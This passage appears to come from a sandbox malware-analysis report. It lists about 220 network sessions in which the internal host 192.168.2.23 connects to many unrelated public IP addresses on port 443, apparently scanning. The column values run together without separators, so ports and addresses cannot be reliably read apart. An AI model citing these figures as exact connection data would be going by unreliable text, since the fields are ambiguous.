                                                17475192.168.2.2350074146.253.183.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17476192.168.2.233458847.129.28.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17477192.168.2.2341080222.214.56.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17478192.168.2.2355432158.102.57.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17479192.168.2.233403299.206.223.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17480192.168.2.2349434216.89.244.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17481192.168.2.2347042217.168.101.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17482192.168.2.2336712179.142.75.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17483192.168.2.2354104148.27.167.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17484192.168.2.235457067.67.182.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17485192.168.2.2347926111.96.204.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17486192.168.2.2336660157.35.220.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17487192.168.2.236090060.201.210.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17488192.168.2.2334082208.59.65.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17489192.168.2.234853614.203.229.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17490192.168.2.234427052.127.75.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17491192.168.2.2334864131.38.99.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17492192.168.2.2344816172.124.87.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17493192.168.2.2360584124.136.92.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17494192.168.2.2351220105.208.186.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17495192.168.2.2343824176.227.224.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17496192.168.2.2338312201.45.237.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17497192.168.2.234237666.176.4.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17498192.168.2.235702283.57.49.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17499192.168.2.233342292.124.133.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17500192.168.2.234657623.72.185.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17501192.168.2.2348808190.105.198.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17502192.168.2.2346540104.48.5.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17503192.168.2.2351010166.254.246.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17504192.168.2.233561049.71.234.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17505192.168.2.2355924117.44.110.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17506192.168.2.233368871.17.137.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17507192.168.2.2350330205.89.31.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17508192.168.2.236085261.214.237.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17509192.168.2.233495880.107.68.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17510192.168.2.2346392196.40.202.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17511192.168.2.2337120160.136.59.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17512192.168.2.2353918185.149.84.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17513192.168.2.233622661.133.15.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17514192.168.2.2357770188.29.68.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17515192.168.2.2351516108.1.64.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17516192.168.2.2355908113.31.70.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17517192.168.2.235097297.78.199.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17518192.168.2.2358422200.149.5.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17519192.168.2.2351586131.109.98.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17520192.168.2.235681071.40.92.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17521192.168.2.2335348183.62.83.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17522192.168.2.2336216216.171.130.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17523192.168.2.2356114128.21.61.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17524192.168.2.233546298.55.66.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17525192.168.2.2336524104.115.50.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17526192.168.2.233710063.143.65.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17527192.168.2.2334498133.237.123.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17528192.168.2.2335026132.212.209.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17529192.168.2.235951076.155.160.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17530192.168.2.2355382140.157.68.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17531192.168.2.233537044.146.41.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17532192.168.2.234922259.209.176.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17533192.168.2.235009061.61.203.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17534192.168.2.2350718111.49.15.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17535192.168.2.2356072112.47.185.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17536192.168.2.234923449.238.16.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17537192.168.2.2353434135.50.72.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17538192.168.2.2345244173.82.187.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17539192.168.2.235661091.220.137.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17540192.168.2.2333750188.48.216.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17541192.168.2.2348110211.36.73.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17542192.168.2.2346882162.162.117.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17543192.168.2.2351152205.125.12.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17544192.168.2.235537895.74.50.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17545192.168.2.2352660169.142.192.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17546192.168.2.233614266.209.169.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17547192.168.2.2350182128.62.148.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17548192.168.2.234106877.118.225.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17549192.168.2.2348292154.146.156.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17550192.168.2.2356348107.122.3.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17551192.168.2.2345688203.115.82.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17552192.168.2.2356924149.94.26.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17553192.168.2.2335180217.70.129.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17554192.168.2.2340042103.160.225.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17555192.168.2.234126290.89.35.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17556192.168.2.2340524190.153.188.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17557192.168.2.234471636.169.56.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17558192.168.2.234105852.14.88.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17559192.168.2.235498064.56.53.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17560192.168.2.2355358103.73.154.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17561192.168.2.2353700136.26.72.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17562192.168.2.233294836.54.16.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17563192.168.2.2350730221.28.228.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17564192.168.2.2334722202.33.142.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17565192.168.2.2347894168.115.78.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17566192.168.2.234194060.19.150.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17567192.168.2.234161090.74.95.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17568192.168.2.2341106152.4.222.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17569192.168.2.235139260.193.6.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17570192.168.2.23460328.154.91.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17571192.168.2.234136675.241.112.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17572192.168.2.233751097.190.214.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17573192.168.2.2355208195.145.164.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17574192.168.2.235288045.166.69.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17575192.168.2.2346370140.212.16.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17576192.168.2.2338396223.147.45.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17577192.168.2.2355880102.21.22.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17578192.168.2.233294246.155.131.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17579192.168.2.2357432100.47.254.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17580192.168.2.2341726136.66.77.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17581192.168.2.235177036.178.189.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17582192.168.2.2359374122.219.255.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17583192.168.2.2353490120.128.160.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17584192.168.2.2348186179.140.60.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17585192.168.2.2341146144.221.204.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17586192.168.2.2345628221.238.246.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17587192.168.2.234997231.218.52.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17588192.168.2.2335912150.106.27.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17589192.168.2.234620218.108.142.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17590192.168.2.2344586107.170.225.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17591192.168.2.235236291.50.37.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17592192.168.2.235162843.117.178.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17593192.168.2.234779878.192.218.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17594192.168.2.2340280191.249.21.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17595192.168.2.235879289.139.105.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17596192.168.2.233371431.72.103.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17597192.168.2.234170282.15.53.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17598192.168.2.2352584163.139.144.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17599192.168.2.2355142189.1.213.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17600192.168.2.23493908.181.50.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17601192.168.2.2353314204.42.208.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17602192.168.2.23354402.251.30.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17603192.168.2.2334172211.187.151.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17604192.168.2.234473297.173.200.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17605192.168.2.2352158103.71.13.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17606192.168.2.2337572144.119.255.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17607192.168.2.2337062143.177.12.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17608192.168.2.2348476213.29.204.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17609192.168.2.2336344180.210.247.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17610192.168.2.235118870.56.17.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17611192.168.2.2341916105.236.114.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17612192.168.2.2340132138.53.251.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17613192.168.2.234457894.158.120.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17614192.168.2.2353072147.49.26.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17615192.168.2.2352672110.85.71.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17616192.168.2.2352106191.233.148.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17617192.168.2.2356628188.57.36.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17618192.168.2.2349024130.53.58.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17619192.168.2.2352766219.239.150.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17620192.168.2.2359326121.252.90.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17621192.168.2.2341056138.52.83.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17622192.168.2.2340572136.253.158.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17623192.168.2.233314442.103.143.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17624192.168.2.235823638.248.174.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17625192.168.2.2344622112.78.39.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17626192.168.2.235733686.216.132.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17627192.168.2.2343054156.9.201.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17628192.168.2.2346472195.104.81.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17629192.168.2.235863019.174.213.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17630192.168.2.23349521.155.176.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17631192.168.2.2347214204.2.240.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17632192.168.2.23516209.198.85.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17633192.168.2.2350140205.73.185.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17634192.168.2.2344548105.120.201.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17635192.168.2.235582620.233.216.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17636192.168.2.2360876135.240.207.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17637192.168.2.235516250.146.11.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17638192.168.2.2357088194.107.244.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17639192.168.2.2352976109.202.170.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17640192.168.2.2360190159.195.74.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17641192.168.2.2360326136.248.45.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17642192.168.2.235184045.130.27.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17643192.168.2.2346030190.31.148.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17644192.168.2.235286847.41.55.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17645192.168.2.235186269.61.103.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17646192.168.2.235077019.89.245.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17647192.168.2.2355946146.194.90.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17648192.168.2.235418618.180.240.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17649192.168.2.2347118112.52.210.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17650192.168.2.2337264196.120.152.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17651192.168.2.234274442.17.115.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17652192.168.2.2354742164.111.182.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17653192.168.2.2339186158.77.159.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17654192.168.2.2353336107.172.14.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17655192.168.2.2347116130.208.137.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17656192.168.2.2351672221.90.69.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17657192.168.2.235713686.235.138.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17658192.168.2.235444049.18.246.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17659192.168.2.234791423.35.219.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17660192.168.2.2340934146.69.181.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17661192.168.2.2337176119.124.10.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17662192.168.2.2354408125.11.148.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17663192.168.2.2343088197.135.131.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17664192.168.2.2347798135.173.234.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17665192.168.2.2360030150.57.216.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17666192.168.2.234392839.244.130.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17667192.168.2.234677042.113.42.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17668192.168.2.2333790203.198.210.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17669192.168.2.23328889.78.9.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17670192.168.2.233280277.237.11.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17671192.168.2.235392214.223.197.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17672192.168.2.23486202.20.200.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17673192.168.2.235356017.66.220.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17674192.168.2.2333390197.100.189.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17675192.168.2.2335156180.91.26.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17676192.168.2.234704620.235.116.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17677192.168.2.2345338135.105.19.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17678192.168.2.233573281.239.101.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17679192.168.2.234919885.78.13.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17680192.168.2.2343646115.149.226.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17681192.168.2.2343994213.201.229.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17682192.168.2.2352588132.61.171.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17683192.168.2.2353862196.9.6.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17684192.168.2.233632093.79.250.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17685192.168.2.233606843.86.134.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17686192.168.2.235345246.31.99.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17687192.168.2.2344924167.209.197.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17688192.168.2.236054297.251.234.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17689192.168.2.2333070143.58.189.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17690192.168.2.235285471.87.70.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17691192.168.2.233923650.157.88.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17692192.168.2.2346818186.126.96.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17693192.168.2.235837682.156.81.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17694192.168.2.2358848171.210.140.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17695192.168.2.2344274140.236.51.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17696192.168.2.2352546193.18.44.161443
                                                TimestampBytes transferredDirectionData


